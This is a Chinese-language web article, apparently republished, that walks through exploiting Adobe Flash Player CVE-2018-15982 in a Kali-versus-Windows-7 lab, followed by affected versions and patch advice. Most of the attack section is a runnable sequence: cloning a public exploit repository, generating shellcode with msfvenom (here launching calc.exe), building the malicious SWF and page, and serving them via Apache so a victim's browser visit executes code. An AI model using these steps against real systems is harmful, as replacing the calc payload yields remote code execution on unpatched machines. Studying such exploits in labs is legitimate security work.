CVE-2018-15982 简单利用

发布日期:2019-11-20 浏览次数: 4167 次

Adobe已发布适用于Windows,macOS,Linux和Chrome OS的Adobe Flash Player安全更新。这些更新解决一个关键的Adobe Flash Player的漏洞和一个重要的Adobe Flash Player的安装程序的漏洞。成功利用可能导致当前用户的上下文中的任意代码执行和权限提升。

一、环境准备
攻击机:kali                               IP:192.168.60.129
靶   机:windows 7                       IP:192.168.60.130
漏洞编号“CVE-2018-15982” 

二、实施如下
Kali 配置相关攻击命令:

下载POC
git clone https://github.com/Ridter/CVE-2018-15982_EXP

生成payload文件并放在poc同目录下
msfvenom -p windows/exec cmd=calc.exe -f raw > 86.bin
msfvenom -p windows/x64/exec cmd=calc.exe -f raw > 64.bin

执行poc生成视频和网页文件
python CVE_2018_15982.py -i 86.bin -I 64.bin

开启apache服务并将生成的文件复制到web目录下
service apache2 start
cp index.html /var/www/html/index.html
cp exploit.swf /var/www/html/exploit.swf

win7操作:
访问http://192.168.60.129/index.html,弹出计算机即远程代码执行成功

三、影响版本:
Adobe Flash Player <= 31.0.0.153
Adobe Flash Player Installer<= 31.0.0.108

四、修补建议:
1、Adobe已发布适用于Windows,macOS,Linux和Chrome OS的Adobe Flash Player安全更新,修复了CVE-2018-15982漏洞。
2、不要打开陌生人提供的网页链接和office文档,都可能内嵌恶意flash文件从而执行远程代码。
3、保持系统和杀毒软件处于最新版本。

五、补丁下载
下载地址:
https://www.flash.cn/

 

转自:黑白之道

分享到:
×

微信扫一扫分享

XML 地图 | Sitemap 地图